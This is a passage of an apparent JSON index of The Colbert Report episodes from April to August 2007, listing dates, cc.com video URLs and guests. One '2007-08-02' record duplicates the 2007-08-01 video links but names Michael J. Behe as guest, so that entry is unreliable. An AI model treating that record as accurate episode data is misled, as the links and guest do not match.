        "http://thecolbertreport.cc.com/videos/tv447i/sean-penn",
        "http://thecolbertreport.cc.com/videos/iowvf0/meta-free-phor-all--shall-i-nail-thee-to-a-summer-s-day-",
        "http://thecolbertreport.cc.com/videos/nzuytf/hyperbole-off"
      ],
      "guest": "Gov. Mike Huckabee"
    },
    {
      "date": "2007-04-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/e9s3wp/intro---4-23-07",
        "http://thecolbertreport.cc.com/videos/tuitvp/gonzales-forgot",
        "http://thecolbertreport.cc.com/videos/xgp7gj/stephanie-s-winning-",
        "http://thecolbertreport.cc.com/videos/bsgdkg/mike-huckabee---running-mate-bid",
        "http://thecolbertreport.cc.com/videos/mksggb/threatdown---myspace",
        "http://thecolbertreport.cc.com/videos/25567u/russell-simmons",
        "http://thecolbertreport.cc.com/videos/75z88c/colbert-nation-online-discussion-group"
      ],
      "guest": "Russell Simmons"
    },
    {
      "date": "2007-04-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6edbk9/intro---4-24-07",
        "http://thecolbertreport.cc.com/videos/9lfdmb/bye-bye-to-boris",
        "http://thecolbertreport.cc.com/videos/zf1m9m/d-c--voting-rights---eleanor-holmes-norton",
        "http://thecolbertreport.cc.com/videos/zebgor/the-word---act-globally",
        "http://thecolbertreport.cc.com/videos/o4vs3o/60--good-news",
        "http://thecolbertreport.cc.com/videos/63paz7/alpha-dog-of-the-week---uncle-ben",
        "http://thecolbertreport.cc.com/videos/i6gv9q/dr--andrew-weil",
        "http://thecolbertreport.cc.com/videos/858p8x/sign-off---captain-lead"
      ],
      "guest": "Dr. Andrew Weil"
    },
    {
      "date": "2007-04-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/939oo7/intro---4-25-07",
        "http://thecolbertreport.cc.com/videos/9cksb2/dead-to-me---long-war",
        "http://thecolbertreport.cc.com/videos/uixydp/the-word---sacrifice",
        "http://thecolbertreport.cc.com/videos/xlgsnw/new-issue-of-gq",
        "http://thecolbertreport.cc.com/videos/vsu32z/four-horsemen-of-the-a-pop-calypse---prayer",
        "http://thecolbertreport.cc.com/videos/877wu4/david-walker",
        "http://thecolbertreport.cc.com/videos/dqbrsh/sign-off---promises"
      ],
      "guest": "David Walker"
    },
    {
      "date": "2007-04-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/uxgeoh/exclusive---better-know-a-protectorate---guam---madeleine-bordallo-pt--1",
        "http://thecolbertreport.cc.com/videos/nfu1lw/exclusive---better-know-a-protectorate---guam---madeleine-bordallo-pt--2",
        "http://thecolbertreport.cc.com/videos/tioqro/intro---4-26-07",
        "http://thecolbertreport.cc.com/videos/ph7bwx/stephanie-lost",
        "http://thecolbertreport.cc.com/videos/nn2tor/the-word---mending-wall",
        "http://thecolbertreport.cc.com/videos/7ibt5q/better-know-a-protectorate---guam---madeleine-bordallo",
        "http://thecolbertreport.cc.com/videos/wax9na/tom-wolfe",
        "http://thecolbertreport.cc.com/videos/4y1aqm/sign-off---yuri-kuklachev"
      ],
      "guest": "Tom Wolfe"
    },
    {
      "date": "2007-04-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qiwo3g/intro---4-30-07",
        "http://thecolbertreport.cc.com/videos/hpmi3p/first-democratic-debate-for--08",
        "http://thecolbertreport.cc.com/videos/lv3s81/neil-degrasse-tyson",
        "http://thecolbertreport.cc.com/videos/o5hsha/tip-wag---shrek",
        "http://thecolbertreport.cc.com/videos/iwnuxq/bill-bradley"
      ],
      "guest": "Bill Bradley"
    },
    {
      "date": "2007-05-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qd26kv/intro---5-1-07",
        "http://thecolbertreport.cc.com/videos/scarky/mitt-s-favorite-book",
        "http://thecolbertreport.cc.com/videos/oh320q/npr-correction",
        "http://thecolbertreport.cc.com/videos/q45jin/the-word---who-cares-",
        "http://thecolbertreport.cc.com/videos/cgfptc/stephen-s-horse",
        "http://thecolbertreport.cc.com/videos/m9pls7/malcolm-gladwell",
        "http://thecolbertreport.cc.com/videos/zj4aga/sign-off---lutefisk"
      ],
      "guest": "Malcolm Gladwell"
    },
    {
      "date": "2007-05-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zxhw8e/intro---5-2-07",
        "http://thecolbertreport.cc.com/videos/vvfvju/hr-1591",
        "http://thecolbertreport.cc.com/videos/a3d8vy/the-word---better-safe-than-sorry",
        "http://thecolbertreport.cc.com/videos/oo27ij/mike-gravel",
        "http://thecolbertreport.cc.com/videos/u82od0/gina-kolata"
      ],
      "guest": "Gina Kolata"
    },
    {
      "date": "2007-05-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/33wl1k/exclusive---better-know-a-district---virginia-s-11th---tom-davis",
        "http://thecolbertreport.cc.com/videos/42iy2c/intro---5-3-07",
        "http://thecolbertreport.cc.com/videos/wsiuq8/battle-of-the-surfaces",
        "http://thecolbertreport.cc.com/videos/0wtt0d/the-word---the-unquisition",
        "http://thecolbertreport.cc.com/videos/2iymfl/better-know-a-district---virginia-s-11th---tom-davis",
        "http://thecolbertreport.cc.com/videos/6azbk5/conn-iggulden",
        "http://thecolbertreport.cc.com/videos/dblp9v/sign-off---impatiens"
      ],
      "guest": "Conn Iggulden"
    },
    {
      "date": "2007-05-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/re08sm/intro---5-7-07",
        "http://thecolbertreport.cc.com/videos/5ra6xp/bonjour--mon-frere",
        "http://thecolbertreport.cc.com/videos/o0gs8q/republican-debate---diversity",
        "http://thecolbertreport.cc.com/videos/ojz8he/the-word---the-intolerant",
        "http://thecolbertreport.cc.com/videos/x5zaaj/cheating-death---vaxadrin",
        "http://thecolbertreport.cc.com/videos/1i1xa2/richard-preston"
      ],
      "guest": "Richard Preston"
    },
    {
      "date": "2007-05-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ah3swk/intro---5-8-07",
        "http://thecolbertreport.cc.com/videos/4vb9ha/shout-out----uss-rhode-island",
        "http://thecolbertreport.cc.com/videos/v2jrqr/the-word---rendered-moot",
        "http://thecolbertreport.cc.com/videos/bkd3bl/threatdown---oprah",
        "http://thecolbertreport.cc.com/videos/296em4/nassim-nicholas-taleb"
      ],
      "guest": "Nassim Nicholas Taleb"
    },
    {
      "date": "2007-05-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bbia54/intro---5-9-07",
        "http://thecolbertreport.cc.com/videos/hs4hrn/mother-s-day",
        "http://thecolbertreport.cc.com/videos/01nwrp/formal-request",
        "http://thecolbertreport.cc.com/videos/ijt89t/salman-rushdie",
        "http://thecolbertreport.cc.com/videos/y81ejs/kiss-the-host",
        "http://thecolbertreport.cc.com/videos/4mwns0/thompson-fuss",
        "http://thecolbertreport.cc.com/videos/8ixf7m/jane-fonda",
        "http://thecolbertreport.cc.com/videos/bhwtjj/sign-off---bedtime-recipe"
      ],
      "guest": "Salman Rushdie, Jane Fonda"
    },
    {
      "date": "2007-05-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/h5fw40/intro---5-10-07",
        "http://thecolbertreport.cc.com/videos/5mohm3/the-word---illusion",
        "http://thecolbertreport.cc.com/videos/6mm58j/hometown-hero-town---naperville--il",
        "http://thecolbertreport.cc.com/videos/1yenb5/the-in-box---doctor-colbert",
        "http://thecolbertreport.cc.com/videos/ya8jd7/jann-wenner",
        "http://thecolbertreport.cc.com/videos/tbehsa/sign-off---time-capsule",
        "http://thecolbertreport.cc.com/videos/59lqle/he-s-singing-in-korean"
      ],
      "guest": "Jann Wenner"
    },
    {
      "date": "2007-05-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/q3z8ca/intro---5-14-07",
        "http://thecolbertreport.cc.com/videos/2wmvq0/ferrari-list",
        "http://thecolbertreport.cc.com/videos/ji8vnp/the-word---supporting-role",
        "http://thecolbertreport.cc.com/videos/62strl/tip-wag---mitt-romney",
        "http://thecolbertreport.cc.com/videos/324045/william-langewiesche",
        "http://thecolbertreport.cc.com/videos/70la8y/stealing-lincoln-s-body"
      ],
      "guest": "William Langewiesche"
    },
    {
      "date": "2007-05-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/458uob/intro---5-15-07",
        "http://thecolbertreport.cc.com/videos/0oyxpf/mcnulty-guilty",
        "http://thecolbertreport.cc.com/videos/c0yfoq/pasadena--india",
        "http://thecolbertreport.cc.com/videos/lda912/the-word---heated-debate",
        "http://thecolbertreport.cc.com/videos/7heoq8/bonus-wag---bush-graphic",
        "http://thecolbertreport.cc.com/videos/yqaslk/alpha-dog-of-the-week---michael-wiley",
        "http://thecolbertreport.cc.com/videos/q5o3oe/walter-isaacson",
        "http://thecolbertreport.cc.com/videos/3mglju/r-i-p--ted-maiman"
      ],
      "guest": "Walter Isaacson"
    },
    {
      "date": "2007-05-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/l9r090/intro---5-16-07",
        "http://thecolbertreport.cc.com/videos/9nd4g1/second-republican-debate",
        "http://thecolbertreport.cc.com/videos/lqz6xp/the-word---level-playing-field",
        "http://thecolbertreport.cc.com/videos/vb25tk/formidable-opponent---peanuts",
        "http://thecolbertreport.cc.com/videos/vd7dcd/howard-dean",
        "http://thecolbertreport.cc.com/videos/west8f/sign-off---name-of-city-here"
      ],
      "guest": "Howard Dean"
    },
    {
      "date": "2007-05-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/j0njxq/intro---5-17-07",
        "http://thecolbertreport.cc.com/videos/xbgufk/the-hammer-is-here-",
        "http://thecolbertreport.cc.com/videos/g57yti/baby-gun-permit",
        "http://thecolbertreport.cc.com/videos/wqfqxb/tom-delay",
        "http://thecolbertreport.cc.com/videos/nfhqh3/randy-kearse",
        "http://thecolbertreport.cc.com/videos/vz0202/sign-off---rafters"
      ],
      "guest": "Randy Kearse, Rep. Tom DeLay"
    },
    {
      "date": "2007-05-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/43r84a/intro---5-21-07",
        "http://thecolbertreport.cc.com/videos/j7bshe/god-loves-a-big-screen-tv",
        "http://thecolbertreport.cc.com/videos/s5odvt/presidential-fraternity",
        "http://thecolbertreport.cc.com/videos/w89fii/the-word---his-way",
        "http://thecolbertreport.cc.com/videos/zg6n7b/cheating-death---internal-decapitation",
        "http://thecolbertreport.cc.com/videos/zhetqf/jared-diamond"
      ],
      "guest": "Jared Diamond"
    },
    {
      "date": "2007-05-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vn2u9p/intro---5-22-07",
        "http://thecolbertreport.cc.com/videos/pp3dmv/popularity-contest",
        "http://thecolbertreport.cc.com/videos/szr9pb/barack-s-a-liar",
        "http://thecolbertreport.cc.com/videos/4wuift/the-word---party-of-change",
        "http://thecolbertreport.cc.com/videos/7bglee/threatdown---environmentalists",
        "http://thecolbertreport.cc.com/videos/661huh/john-amaechi",
        "http://thecolbertreport.cc.com/videos/ivskf6/sign-off---lesson-forgotten"
      ],
      "guest": "John Amaechi"
    },
    {
      "date": "2007-05-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/pwwndq/intro---5-23-07",
        "http://thecolbertreport.cc.com/videos/ac7obb/bush-is-back-",
        "http://thecolbertreport.cc.com/videos/2t0qn4/illegal-immigration---bay-buchanan",
        "http://thecolbertreport.cc.com/videos/m6d100/threatdown---pellicano-",
        "http://thecolbertreport.cc.com/videos/0v2e97/bob-deans",
        "http://thecolbertreport.cc.com/videos/1kaqcp/sign-off---hi-def"
      ],
      "guest": "Bay Buchanan, Bob Deans"
    },
    {
      "date": "2007-05-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fc4ao7/intro---5-24-07",
        "http://thecolbertreport.cc.com/videos/ihom0u/fleet-week",
        "http://thecolbertreport.cc.com/videos/5d38de/big-loud-flag",
        "http://thecolbertreport.cc.com/videos/oxz2g4/up-in-smoke",
        "http://thecolbertreport.cc.com/videos/brpu8j/better-know-a-district---arizona-s-7th---raul-grijalva",
        "http://thecolbertreport.cc.com/videos/vylxk3/jimmy-wales",
        "http://thecolbertreport.cc.com/videos/xj2s00/speaking-fee"
      ],
      "guest": "Jimmy Wales"
    },
    {
      "date": "2007-06-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/38wiug/intro---6-4-07",
        "http://thecolbertreport.cc.com/videos/oujnzk/uneventful-vacation",
        "http://thecolbertreport.cc.com/videos/5475j4/democratic-presidential-debate---venue",
        "http://thecolbertreport.cc.com/videos/3bhuju/jan-schakowsky",
        "http://thecolbertreport.cc.com/videos/svome1/better-know-a-district---illinois--9th---jan-schakowsky",
        "http://thecolbertreport.cc.com/videos/o9kyh0/leon-botstein",
        "http://thecolbertreport.cc.com/videos/kaun5v/sign-off---mardi-gras-mask"
      ],
      "guest": "Rep. Jan Schakowsky, Leon Botstein"
    },
    {
      "date": "2007-06-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7sdcg5/intro---6-5-07",
        "http://thecolbertreport.cc.com/videos/cvm31h/you-ve-been-scootered-",
        "http://thecolbertreport.cc.com/videos/j3ieeu/yahoo-korea---rain",
        "http://thecolbertreport.cc.com/videos/8226p8/the-word---mission-control",
        "http://thecolbertreport.cc.com/videos/n0lk8c/the-god-machine-",
        "http://thecolbertreport.cc.com/videos/l7y8g1/when-animals-attack-our-morals---flamingos",
        "http://thecolbertreport.cc.com/videos/rsex2i/jessica-valenti"
      ],
      "guest": "Jessica Valenti"
    },
    {
      "date": "2007-06-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jorp7o/intro---6-6-07",
        "http://thecolbertreport.cc.com/videos/h69756/sinner-edwards",
        "http://thecolbertreport.cc.com/videos/5mthf9/the-word---airogance",
        "http://thecolbertreport.cc.com/videos/cujedg/tip-wag---deep-purple",
        "http://thecolbertreport.cc.com/videos/ngt9bf/carl-bernstein",
        "http://thecolbertreport.cc.com/videos/xd82es/craziest-f--king-thing-i-ve-ever-heard---octopi"
      ],
      "guest": "Carl Bernstein"
    },
    {
      "date": "2007-06-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/b0xqmj/intro---6-7-07",
        "http://thecolbertreport.cc.com/videos/w1jmjp/pope-jump",
        "http://thecolbertreport.cc.com/videos/ovs97y/the-word---rodham",
        "http://thecolbertreport.cc.com/videos/tl388o/better-know-a-district---washington-s-9th---adam-smith",
        "http://thecolbertreport.cc.com/videos/ty2mfm/cullen-murphy",
        "http://thecolbertreport.cc.com/videos/sitbn5/sign-off---vomitorium"
      ],
      "guest": "Cullen Murphy"
    },
    {
      "date": "2007-06-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1yiwr5/intro---6-11-07",
        "http://thecolbertreport.cc.com/videos/dufa3e/commencement-speeches",
        "http://thecolbertreport.cc.com/videos/2k0q1b/the-word---easy-a",
        "http://thecolbertreport.cc.com/videos/kd0cks/revenge-on-knox-college",
        "http://thecolbertreport.cc.com/videos/qrkfud/albania-greets-president-bush",
        "http://thecolbertreport.cc.com/videos/zpjdcg/michael-gershon"
      ],
      "guest": "Dr. Michael D. Gershon"
    },
    {
      "date": "2007-06-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/b08r7k/intro---6-12-07",
        "http://thecolbertreport.cc.com/videos/8dqxf0/bush-s-missing-watch",
        "http://thecolbertreport.cc.com/videos/sse01t/mr--dyachenko--tear-down-this-wall",
        "http://thecolbertreport.cc.com/videos/lhl8km/tommy-chong--commentator",
        "http://thecolbertreport.cc.com/videos/ey1hjm/mr--dyachenko--tear-down-this-watermelon",
        "http://thecolbertreport.cc.com/videos/2krcmy/colbert-platinum---butler-shortage",
        "http://thecolbertreport.cc.com/videos/gdyajn/josh-wolf",
        "http://thecolbertreport.cc.com/videos/r2b64h/mr--dyachenko--tear-me-off-a-piece-of-this-cake"
      ],
      "guest": "Josh Wolf"
    },
    {
      "date": "2007-06-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/onm1u4/intro---6-13-07",
        "http://thecolbertreport.cc.com/videos/fytk75/ruined-anniversary",
        "http://thecolbertreport.cc.com/videos/6nklj9/freezing-cold-case-files--otzi",
        "http://thecolbertreport.cc.com/videos/tnydpx/the-word---pathophysiology",
        "http://thecolbertreport.cc.com/videos/2bu2sn/threatdown---robots",
        "http://thecolbertreport.cc.com/videos/o2ywub/ron-paul",
        "http://thecolbertreport.cc.com/videos/cakp5s/sign-off---crispy-deliciousness"
      ],
      "guest": "Rep. Ron Paul"
    },
    {
      "date": "2007-06-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/oa9gd7/intro---6-14-07",
        "http://thecolbertreport.cc.com/videos/6uc0h1/fred-thompson-on-fire",
        "http://thecolbertreport.cc.com/videos/g52jco/stephen-benjamin",
        "http://thecolbertreport.cc.com/videos/0agktt/bears---balls---summer-vacation-edition",
        "http://thecolbertreport.cc.com/videos/a0p792/daniel-b--smith",
        "http://thecolbertreport.cc.com/videos/llk3nk/sign-off---the-land-of-nod"
      ],
      "guest": "Daniel B. Smith"
    },
    {
      "date": "2007-06-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rwup1e/intro---6-18-07",
        "http://thecolbertreport.cc.com/videos/k3t99j/papal-encounter",
        "http://thecolbertreport.cc.com/videos/rbx9fh/the-price-is-right",
        "http://thecolbertreport.cc.com/videos/w0pe9q/the-word---mcconaughey",
        "http://thecolbertreport.cc.com/videos/yfclcj/stephen-on-itunes",
        "http://thecolbertreport.cc.com/videos/7jalja/tip-wag---arnold-schwarzenegger",
        "http://thecolbertreport.cc.com/videos/ozfwje/toby-keith"
      ],
      "guest": "Toby Keith"
    },
    {
      "date": "2007-06-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ndbsf6/intro---6-19-07",
        "http://thecolbertreport.cc.com/videos/qxyadz/secret-clapton-concert",
        "http://thecolbertreport.cc.com/videos/0y4kih/marybeth-garrigan",
        "http://thecolbertreport.cc.com/videos/mzxikb/countdown-to-armageddon",
        "http://thecolbertreport.cc.com/videos/ij3mgr/alpha-dog-of-the-week---robert-bork",
        "http://thecolbertreport.cc.com/videos/u1dk1e/anne-marie-slaughter",
        "http://thecolbertreport.cc.com/videos/kxk02d/sign-off---manifesto"
      ],
      "guest": "Harriet the Eagle with handler, Anne-Marie Slaughter"
    },
    {
      "date": "2007-06-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jbdbyq/intro---6-20-07",
        "http://thecolbertreport.cc.com/videos/beccdu/bloomberg-for-president",
        "http://thecolbertreport.cc.com/videos/xe5j30/the-word---justice",
        "http://thecolbertreport.cc.com/videos/4yziuf/cheating-death---colgate",
        "http://thecolbertreport.cc.com/videos/7m9bgr/will-schwalbe",
        "http://thecolbertreport.cc.com/videos/glo9c6/sign-off---job-well-done"
      ],
      "guest": "Will Schwalbe"
    },
    {
      "date": "2007-06-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/um7qsm/intro---6-21-07",
        "http://thecolbertreport.cc.com/videos/psamg7/ron-paul-s-colbert-bump",
        "http://thecolbertreport.cc.com/videos/38xzef/difference-makers---tim-donnelly",
        "http://thecolbertreport.cc.com/videos/2oyfu8/vincent-bugliosi",
        "http://thecolbertreport.cc.com/videos/dlqbr6/sign-off---goodbye-to-mr--wizard",
        "http://thecolbertreport.cc.com/videos/35278z/the-word---porking"
      ],
      "guest": "Vincent Bugliosi"
    },
    {
      "date": "2007-06-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wvrrio/intro---6-25-07",
        "http://thecolbertreport.cc.com/videos/xvrdq7/the-freegans",
        "http://thecolbertreport.cc.com/videos/dqezp0/the-word---fourth-branch",
        "http://thecolbertreport.cc.com/videos/oldt6o/threatdown---coral-reefs",
        "http://thecolbertreport.cc.com/videos/mhjtgw/tom-hayden",
        "http://thecolbertreport.cc.com/videos/5zivhy/sign-off---contract"
      ],
      "guest": "Tom Hayden"
    },
    {
      "date": "2007-06-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2dxfpk/intro---6-26-07",
        "http://thecolbertreport.cc.com/videos/id2z8d/christmas-in-june",
        "http://thecolbertreport.cc.com/videos/eelu64/tony-blair-s-conversion",
        "http://thecolbertreport.cc.com/videos/tpff57/the-word---elsewhere",
        "http://thecolbertreport.cc.com/videos/0t819z/christmas-presents",
        "http://thecolbertreport.cc.com/videos/5awnum/alpha-dog-of-the-week---fred-thompson",
        "http://thecolbertreport.cc.com/videos/1uvv46/david-france",
        "http://thecolbertreport.cc.com/videos/96ew1f/sign-off---visions-of-sugarplums"
      ],
      "guest": "David France"
    },
    {
      "date": "2007-06-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/47zhcv/intro---6-27-07",
        "http://thecolbertreport.cc.com/videos/y34h2c/give-stephen-an-iphone",
        "http://thecolbertreport.cc.com/videos/wepdgq/tom-blanton",
        "http://thecolbertreport.cc.com/videos/f6in26/four-horsemen-of-the-a-pop-calypse---shaq",
        "http://thecolbertreport.cc.com/videos/msuhoe/daniel-gilbert"
      ],
      "guest": "Tom Blanton, Daniel Gilbert"
    },
    {
      "date": "2007-06-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ftc2tr/intro---6-28-07",
        "http://thecolbertreport.cc.com/videos/2o9nj2/spot-the-difference",
        "http://thecolbertreport.cc.com/videos/kb8br0/civil-unrest-in-iran",
        "http://thecolbertreport.cc.com/videos/0lfyqf/the-word---profiles-in-timing",
        "http://thecolbertreport.cc.com/videos/owh6vd/colbert-platinum---luxury-car-wrecks",
        "http://thecolbertreport.cc.com/videos/f9y6wb/doug-bailey",
        "http://thecolbertreport.cc.com/videos/oxeeoj/sign-off---going-on-vacation"
      ],
      "guest": "Doug Bailey"
    },
    {
      "date": "2007-07-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rsv8g9/intro---7-16-07",
        "http://thecolbertreport.cc.com/videos/bwablo/tunneling-to-free-scooter-libby",
        "http://thecolbertreport.cc.com/videos/lnroz7/richard-florida",
        "http://thecolbertreport.cc.com/videos/scrz03/difference-makers---johnna-mink",
        "http://thecolbertreport.cc.com/videos/r0qxf5/ben-nelson",
        "http://thecolbertreport.cc.com/videos/zabqma/sign-off---take-five"
      ],
      "guest": "Richard Florida, Sen. Ben Nelson"
    },
    {
      "date": "2007-07-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/cliw91/intro---7-17-07",
        "http://thecolbertreport.cc.com/videos/zl176l/all-night-senate-session",
        "http://thecolbertreport.cc.com/videos/depupc/the-word---victimcrite",
        "http://thecolbertreport.cc.com/videos/hdn59k/1-428-minutes-to-go",
        "http://thecolbertreport.cc.com/videos/gafa5t/tip-wag---michael-chertoff-s-gut-o-meter",
        "http://thecolbertreport.cc.com/videos/ev6dp9/mark-moffett",
        "http://thecolbertreport.cc.com/videos/1jb3qq/threatdown---500-threat-marathon"
      ],
      "guest": "Mark Moffett"
    },
    {
      "date": "2007-07-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/uf8wpk/intro---7-18-07",
        "http://thecolbertreport.cc.com/videos/gn1bt7/2007-filibustacular",
        "http://thecolbertreport.cc.com/videos/hqa77b/the-word---smiley-face",
        "http://thecolbertreport.cc.com/videos/ysfdjx/pope-goes-green",
        "http://thecolbertreport.cc.com/videos/artj1e/alpha-dog-of-the-week---david-beckham",
        "http://thecolbertreport.cc.com/videos/ga3vsc/john-mellencamp"
      ],
      "guest": "John Mellencamp"
    },
    {
      "date": "2007-07-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/19mw0q/intro---7-19-07",
        "http://thecolbertreport.cc.com/videos/1esv0i/republican-candidates--suffering",
        "http://thecolbertreport.cc.com/videos/a9zoea/michael-moore",
        "http://thecolbertreport.cc.com/videos/bn2nox/march-to-enslavement---stephen-gets-an-iphone",
        "http://thecolbertreport.cc.com/videos/9p0lhk/frank-sulloway",
        "http://thecolbertreport.cc.com/videos/qhp9z3/sign-off---length-of-the-show-contest"
      ],
      "guest": "Frank Sulloway"
    },
    {
      "date": "2007-07-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nc8xh3/intro---7-23-07",
        "http://thecolbertreport.cc.com/videos/fkxqbr/stephen-s-fountain-of-youth",
        "http://thecolbertreport.cc.com/videos/4rqgp5/the-word---premium-package",
        "http://thecolbertreport.cc.com/videos/l0ig1p/colbert-platinum---private-submarines",
        "http://thecolbertreport.cc.com/videos/6e6gd1/simon-schama",
        "http://thecolbertreport.cc.com/videos/vfxa7p/sign-off---just-about-out-of-time"
      ],
      "guest": "Simon Schama"
    },
    {
      "date": "2007-07-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/15l5ov/intro---7-24-07",
        "http://thecolbertreport.cc.com/videos/d9v0fp/bush-s-butt",
        "http://thecolbertreport.cc.com/videos/nvdygh/the-word---modest-porpoisal",
        "http://thecolbertreport.cc.com/videos/e5420t/movies-that-are-destroying-america--chuck-and-larry",
        "http://thecolbertreport.cc.com/videos/yqgj2h/anthony-romero",
        "http://thecolbertreport.cc.com/videos/alsjeo/joining-the-illuminati"
      ],
      "guest": "Anthony D. Romero"
    },
    {
      "date": "2007-07-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/shyero/intro---7-25-07",
        "http://thecolbertreport.cc.com/videos/4md3eg/daily-kos",
        "http://thecolbertreport.cc.com/videos/ikcdyi/the-word---no-regrets",
        "http://thecolbertreport.cc.com/videos/bdjzxb/thompson-campaign",
        "http://thecolbertreport.cc.com/videos/bc0mf3/hometown-hero-town---bryce-canyon-city",
        "http://thecolbertreport.cc.com/videos/2f2r58/charles-kaiser"
      ],
      "guest": "Charles Kaiser"
    },
    {
      "date": "2007-07-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wth3ve/intro---7-26-07",
        "http://thecolbertreport.cc.com/videos/3or3gc/how-did-stephen-break-his-wrist-",
        "http://thecolbertreport.cc.com/videos/if6h6s/industrial-hemp---medical-marijuana---aaron-houston",
        "http://thecolbertreport.cc.com/videos/8p2na8/advice-to-the-gods---nepalese-pre-teen-goddesses",
        "http://thecolbertreport.cc.com/videos/kcb6kk/bob-shrum"
      ],
      "guest": "Robert Shrum"
    },
    {
      "date": "2007-07-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8m5y0f/intro---7-30-07",
        "http://thecolbertreport.cc.com/videos/tyo2os/wrist-violence---glorification",
        "http://thecolbertreport.cc.com/videos/9e0vz0/pollution-immigration",
        "http://thecolbertreport.cc.com/videos/brdooe/the-word---solidarity",
        "http://thecolbertreport.cc.com/videos/ii5xvp/threatdown---scottish-surgeons",
        "http://thecolbertreport.cc.com/videos/o55kxd/evan-osnos"
      ],
      "guest": "Evan Osnos"
    },
    {
      "date": "2007-07-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/01xv20/intro---7-31-07",
        "http://thecolbertreport.cc.com/videos/bgyn76/wrist-violence-epidemic",
        "http://thecolbertreport.cc.com/videos/aryder/smokin--pole---arc--who-goes-there-",
        "http://thecolbertreport.cc.com/videos/tg3umi/the-word---special-prosecutor",
        "http://thecolbertreport.cc.com/videos/egvqvt/rupert-murdoch-purchases-the-wall-street-journal",
        "http://thecolbertreport.cc.com/videos/i9cr44/sport-report---barry-bonds",
        "http://thecolbertreport.cc.com/videos/3tom79/kathleen-kennedy-townsend"
      ],
      "guest": "Kathleen Kennedy Townsend"
    },
    {
      "date": "2007-08-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jtpqex/intro---8-1-07",
        "http://thecolbertreport.cc.com/videos/b8kbe8/dr--jerry-vizzone",
        "http://thecolbertreport.cc.com/videos/zd2nvn/the-word---college-credit",
        "http://thecolbertreport.cc.com/videos/nlqwhc/when-animals-attack-our-morals---hollywood-pigeons",
        "http://thecolbertreport.cc.com/videos/agisiu/michael-beschloss",
        "http://thecolbertreport.cc.com/videos/a0yv9l/30-minute-anniversary"
      ],
      "guest": "Michael Beschloss"
    },
    {
      "date": "2007-08-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qjky5n/farewell-ingmar-bergman",
        "http://thecolbertreport.cc.com/videos/jtpqex/intro---8-1-07",
        "http://thecolbertreport.cc.com/videos/b8kbe8/dr--jerry-vizzone",
        "http://thecolbertreport.cc.com/videos/zd2nvn/the-word---college-credit",
        "http://thecolbertreport.cc.com/videos/nlqwhc/when-animals-attack-our-morals---hollywood-pigeons",
        "http://thecolbertreport.cc.com/videos/agisiu/michael-beschloss",
        "http://thecolbertreport.cc.com/videos/a0yv9l/30-minute-anniversary"
      ],
      "guest": "Michael J. Behe"
    },
    {
      "date": "2007-08-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tqb1ek/intro---8-2-07",
        "http://thecolbertreport.cc.com/videos/4fa4lg/superhighway",
        "http://thecolbertreport.cc.com/videos/sg9xg3/rick-macarthur",
        "http://thecolbertreport.cc.com/videos/vc3b3c/thighmasters-for-the-troops",
        "http://thecolbertreport.cc.com/videos/ptvqa7/sport-report---barry-smash",
        "http://thecolbertreport.cc.com/videos/z81ulz/michael-behe"
      ],
      "guest": "Michael J. Behe"
    },
    {
      "date": "2007-08-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7r677j/intro---8-7-07",
        "http://thecolbertreport.cc.com/videos/4kw9z4/yearly-kos-convention",
        "http://thecolbertreport.cc.com/videos/f3w2rh/the-word---the-dark-side",
        "http://thecolbertreport.cc.com/videos/zwnri3/better-know-a-protectorate---american-samoa---eni-faleomavaega",
        "http://thecolbertreport.cc.com/videos/d21xmf/ian-bogost",
        "http://thecolbertreport.cc.com/videos/kzlukl/sign-off---colbert-commonsensicals"
      ],
      "guest": "Ian Bogost"
    },
    {
      "date": "2007-08-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4f7upv/intro---8-8-07",
        "http://thecolbertreport.cc.com/videos/oxms8d/wrist-watch---fighting-back",
